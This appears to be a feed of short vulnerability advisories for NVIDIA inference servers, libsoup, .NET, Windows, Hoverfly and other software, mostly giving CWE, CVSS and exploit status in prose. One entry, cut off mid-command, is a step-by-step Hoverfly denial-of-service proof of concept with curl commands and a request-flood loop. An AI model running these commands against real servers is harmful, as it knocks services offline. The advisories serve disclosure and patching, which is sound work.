Missing authentication in NVIDIA TensorRT-LLM for Linux lets an attacker reach the disaggregated orchestrator's FastAPI server directly and read, write, or delete internal cluster state, resulting in information disclosure, data tampering, and denial of service. The flaw (CWE-306) affects the orchestration layer that coordinates disaggregated prefill/decode inference workers. No public exploit identified at time of analysis, and the CVSS 3.1 base score is 7.3 with a local attack vector despite the request-based nature of the issue.
Memory corruption in NVIDIA TensorRT-LLM allows an attacker with local access to trigger a write-what-where primitive (CWE-123), enabling arbitrary memory writes that can corrupt data, crash the inference service, or leak sensitive information. The flaw carries a CVSS 7.4 (High) score with a local attack vector and high attack complexity, and affects the TensorRT-LLM library used to build and serve optimized large-language-model inference on NVIDIA GPUs. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Heap-based buffer overflow in NVIDIA TensorRT-LLM's tensor deserialization path lets an adjacent, unauthenticated attacker corrupt heap memory by supplying a crafted serialized tensor, potentially causing information disclosure, data tampering, or denial of service. All platforms running affected TensorRT-LLM versions are impacted. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV; NVIDIA rates exploitation as high-complexity (AC:H).
Local privilege-context deserialization in NVIDIA TensorRT-LLM lets an attacker who already has same-user access to a host running the inference stack abuse its inter-process communication layer to trigger unsafe object deserialization (CWE-502), potentially yielding code execution, information disclosure, data tampering, and denial of service. The flaw is vendor-reported by NVIDIA and carries a CVSS 3.1 base of 7.8 (AV:L), meaning it is not remotely reachable but converts existing local access into full compromise of the model-serving process. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Denial of service in NVIDIA Triton Inference Server on Linux allows remote unauthenticated attackers to exhaust host memory by triggering a memory leak (CWE-401, missing release of memory after effective lifetime), degrading or crashing the inference service. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N, A:H) indicates trivial network-reachable exploitation with no authentication and high availability impact, but no confidentiality or integrity exposure. No public exploit identified at time of analysis and the CVE is not listed in CISA KEV.
Denial of service in NVIDIA Triton Inference Server on Linux allows remote unauthenticated attackers to crash the service by triggering an uncaught exception (CWE-248), taking the model-serving endpoint offline. The flaw carries CVSS 7.5 with a pure availability impact (C:N/I:N/A:H) and no public exploit identified at time of analysis; it was reported by NVIDIA itself. No confidentiality or integrity compromise is involved — the sole consequence is loss of inference availability.
Denial of service in NVIDIA Triton Inference Server for Linux lets remote unauthenticated attackers exhaust server resources (CWE-400 uncontrolled resource consumption) and render the AI/ML inference endpoint unavailable, with no impact to confidentiality or integrity. The CVSS 3.1 base score is 7.5 (AV:N/AC:L/PR:N/UI:N/A:H), reflecting network-reachable, low-complexity, no-privilege exploitation. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; no EPSS score was provided in the input.
Denial of service in NVIDIA Triton Inference Server for Linux allows a remote, unauthenticated attacker to disrupt availability by triggering use of an expired (stale) file descriptor. The flaw impacts availability only (no data exposure or code execution) and, per CVSS PR:N/UI:N, requires no authentication or user interaction. There is no public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV; no EPSS score was provided in the input.
A vulnerability was found in libsoup's HTTP/2 protocol implementation. The library fails to correctly release memory context blocks under specific stream termination conditions, such as when an HTTP/2 connection encounters window exhaustion or explicit stream resets. A remote, unauthenticated attacker acting as a malicious network peer can trick the connection engine into allocating stream states that are subsequently leaked during cleanup. Over a sustained period, this flaw allows the remote attacker to consume the system's heap allocations incrementally, triggering a denial of service (DoS) through an ultimate Out-of-Memory (OOM) application crash.
Remote denial of service in libsoup, the GNOME HTTP client/server library, allows unauthenticated attackers to crash any application using libsoup's WebSocket support by sending a single malformed control frame. The parser fails to enforce RFC 6455's 125-byte limit on PING/PONG/CLOSE control frames and mishandles the oversized payload instead of cleanly closing the connection, causing an internal processing crash. Red Hat reports the flaw across RHEL 6 through 10; no public exploit has been identified at time of analysis and no EPSS score was provided.
Denial of service in NVIDIA Triton Inference Server for Linux stems from a stack-based buffer overflow (CWE-121) reachable by remote, unauthenticated attackers over the network. Per the CVSS 3.1 vector, exploitation requires no privileges or user interaction and impacts only availability (A:H), with no confidentiality or integrity effect. There is no public exploit identified at time of analysis, and the CVE is not listed in CISA KEV; no EPSS score was provided in the input.
Denial of service in NVIDIA Triton Inference Server for Linux allows remote unauthenticated attackers to trigger uncontrolled resource consumption, exhausting server resources and rendering the model-serving endpoint unavailable. The flaw carries a CVSS 7.5 with a pure availability impact and no confidentiality or integrity effect; it was reported by NVIDIA, and there is no public exploit identified at time of analysis. No special access is required, but the concrete resource-exhaustion trigger is not detailed in the available data.
Denial of service in libsoup's WebSocket permessage-deflate implementation lets a remote, unauthenticated attacker crash applications by sending a small, highly compressed 'decompression bomb' that expands without bound during inflation, exhausting memory and triggering an Out-of-Memory kill. All Red Hat Enterprise Linux 6 through 10 ship the affected libsoup HTTP/WebSocket library, and client connections are especially exposed because the decompressed-size guard (max_total_message_size) is disabled by default for clients. There is no public exploit identified at time of analysis and this CVE is not listed in CISA KEV.
Network denial of service in Microsoft .NET 8.0, 9.0, and 10.0 (and the corresponding Visual Studio 2022/2026 tooling) allows an unauthorized remote attacker to exhaust system resources and render affected applications unavailable. The flaw stems from allocation of resources without limits or throttling, meaning a single crafted network interaction can trigger disproportionate resource consumption. Reported by Microsoft with a vendor patch available; no public exploit identified at time of analysis and it is not listed in CISA KEV.
Arbitrary file write in yutu, a Go-based YouTube CLI and MCP server, lets any caller of the built-in `caption-download` MCP tool place attacker-controlled bytes at any filesystem path the yutu process can write to. The vulnerable `Caption.Download()` calls `os.Create()` on the caller-supplied `file` parameter, bypassing the `YUTU_ROOT` (`pkg.Root`/`os.OpenRoot`) confinement that every other caption write path enforces. Publicly available exploit code exists (a self-contained Docker PoC ships with the advisory); the flaw is not in CISA KEV and no active exploitation is reported, and the vendor has released a fixed version (0.10.9-dev1).
Denial of service in Microsoft .NET (including .NET 8.0/9.0/10.0 and .NET Framework 3.5 through 4.8.1) lets a remote unauthenticated attacker exhaust server resources by sending crafted network traffic that triggers unbounded resource allocation. Rated CVSS 7.5 with availability-only impact, it affects default configurations of network-facing .NET applications; no public exploit identified at time of analysis and it is not listed in CISA KEV.
Network-based denial of service in Microsoft .NET 8.0, 9.0, and 10.0 allows an unauthenticated remote attacker to exhaust server resources and render applications unresponsive by exploiting uncontrolled resource allocation (CWE-770) in the runtime. The flaw carries CVSS 7.5 (availability-only impact) and affects the shared .NET runtime that underpins ASP.NET Core web services, so any internet-facing .NET workload is exposed. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; Microsoft has released a fix.
Denial of service in Microsoft .NET (versions 8.0, 9.0, and 10.0) and the legacy .NET Framework (3.5 through 4.8.1) allows a remote unauthenticated attacker to exhaust server resources over the network, causing availability loss. The flaw stems from missing limits or throttling on resource allocation (CWE-770), and Microsoft has released a patch via MSRC. There is no public exploit identified at time of analysis, and EPSS/KEV data were not supplied, so this appears to be a proactively patched issue rather than one under active exploitation.
Arbitrary file write in Anyquery Server Mode (versions < 0.4.5) allows unauthenticated remote attackers to write files to any path the process can access by abusing SQLite's native ATTACH DATABASE command exposed over the MySQL-compatible listener. Because the server blindly proxies SQL to the underlying SQLite engine, an attacker can create files such as cron jobs, PHP web shells, or SSH authorized_keys and escalate the file write into remote code execution or denial of service. A working step-by-step proof-of-concept is published in the vendor's GitHub Security Advisory (GHSA-xrcf-6jh3-ggvx); there is no CISA KEV entry and no confirmed in-the-wild exploitation at time of analysis.
Denial of service in Open5GS (open-source 5G/EPC core) through version 2.7.7 lets remote unauthenticated attackers crash the AMF by sending a malformed NAS 5GS mobile-identity information element, triggering a heap out-of-bounds read before authentication completes. Because the AMF handles mobility management for the entire network, a single crafted pre-authentication message can produce a subscriber-wide outage rather than affecting only the sender. There is no public exploit identified at time of analysis, and the flaw is not listed in CISA KEV, but the pre-auth network-reachable nature makes it a high-priority availability issue for anyone running Open5GS in production.
Heap buffer over-read in libsoup's HTTP/2 GOAWAY frame parser allows remote unauthenticated attackers to crash applications or leak heap memory fragments by sending a malformed frame with a non-NUL-terminated Additional Debug Data payload. Affected deployments include applications built on libsoup running on Red Hat Enterprise Linux 10 that accept or initiate HTTP/2 connections. A proof-of-concept exists per SSVC data, though exploitation is rated non-automatable and this vulnerability is not listed in the CISA KEV catalog at time of analysis.
Unauthenticated remote denial of service in StacklokLabs MKP (Model Context Protocol for Kubernetes) server versions before 0.4.1 lets a single crafted `tools/call` request against the default `:8080` endpoint exhaust process memory. The `get_resource` tool accepts attacker-controlled `limitBytes`/`tailLines` values with no upper bound and streams the entire Kubernetes pod-log response into an in-memory `bytes.Buffer`, driving an OOM kill (dynamic reproduction grew RSS from 25.8 MB to 1,179.3 MB on one request). Publicly available exploit code exists in the GitHub Security Advisory; there is no public evidence of active exploitation.
{ "actionName": "leak", "remote": "http://192.0.2.1:9999/blackhole", "delayInMs": 0 }' ``` **Step 3: Load a catch-all simulation** ```bash curl -X PUT http://localhost:8888/api/v2/simulation \ -H "Content-Type: application/json" \ -d '{ "data": { "pairs": [{ "request": {"path": [{"matcher": "glob", "value": "*"}]}, "response": {"status": 200, "body": "ok", "postServeAction": "leak"} }], "globalActions": {"delays": [], "delaysLogNormal": []} }, "meta": {"schemaVersion": "v5.2"} }' ``` **Step 4: Flood with requests** ```bash for i in $(seq 1 10000); do curl -s -x http://localhost:8500 "http://target.com/req${i}" & [ $((i % 100)) -eq 0 ] && wait done ``` **Verified memory impact on Hoverfly v1.12.7:** ``` Memory before: 20,064 KB Memory after 50 requests: 23,376 KB Memory increase: 3,312 KB (66 KB per goroutine) ``` At this rate: - 1,000 requests = ~64 MB leaked - 10,000 requests = ~640 MB leaked - 100,000 requests = ~6.4 GB leaked → OOM crash An attacker with access to the admin API (unauthenticated by default) can cause a complete denial of service by: 1. Registering a remote post-serve action pointing to a non-responsive endpoint. 2. Loading a catch-all simulation that triggers the action on every request. 3. Sending proxy traffic, each request permanently leaks a goroutine and its associated memory.
Denial of service in Hoverfly's Diff mode (versions ≤ 1.12.7) lets any client with proxy access crash the entire process by sending concurrent requests. The `AddDiff()` function writes to the shared `responsesDiff` map without a mutex, so simultaneous proxy requests - the normal case for a proxy - trigger Go's built-in concurrent-map detector, producing an unrecoverable `fatal error: concurrent map read and map write` that kills the process. Publicly available exploit code exists (a working POC is embedded in the GitHub advisory), though there is no public exploit identified as actively used in the wild and no KEV listing.
Insufficient Parameter Validation in the SchedGet() system call could allow an attacker with local access to cause a crash of the QNX Neutrino kernel.
Local privilege escalation in the Microsoft Windows Client-Side Caching (CSC) Service, driven by a use-after-free (CWE-416) memory-corruption flaw affecting Windows 10 (1607 through 22H2), Windows 11 (24H2/25H2/26H1), and Windows Server 2012 through 2025. An authorized attacker who already holds low-level privileges (PR:L) on the host can trigger the freed-object reuse to gain elevated, likely SYSTEM-level, privileges. The issue was reported by Microsoft with a patch available; there is no public exploit identified at time of analysis and no CISA KEV listing.
Local privilege escalation in the Windows 11 (version 26H1) Desktop Window Manager (DWM) allows an authenticated low-privileged user to gain SYSTEM-level control by exploiting a use-after-free (CWE-416) memory-corruption flaw. Reported by Microsoft and carrying a CVSS 3.1 score of 7.8, the flaw grants full confidentiality, integrity, and availability impact once triggered locally. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV, but DWM EoP bugs are a historically favored post-compromise primitive.
Local privilege escalation in the Desktop Window Manager (DWM) component of Windows 11 version 26H1 allows an authenticated local attacker to elevate to SYSTEM by triggering a use-after-free memory corruption condition. The CVSS 3.1 vector (AV:L/PR:L) confirms an already-authenticated low-privileged user is required, and full compromise of confidentiality, integrity, and availability follows successful exploitation. Microsoft has released a patch; there is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.
Local privilege escalation in the Windows Win32K kernel-mode subsystem allows an authenticated attacker to elevate to SYSTEM by exploiting a use-after-free (CWE-416) memory-corruption condition. The flaw affects a broad range of supported Windows client and server releases (Windows 10 1607 through Windows 11 26H1, and Windows Server 2016 through 2025). Reported by Microsoft with a patch available; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.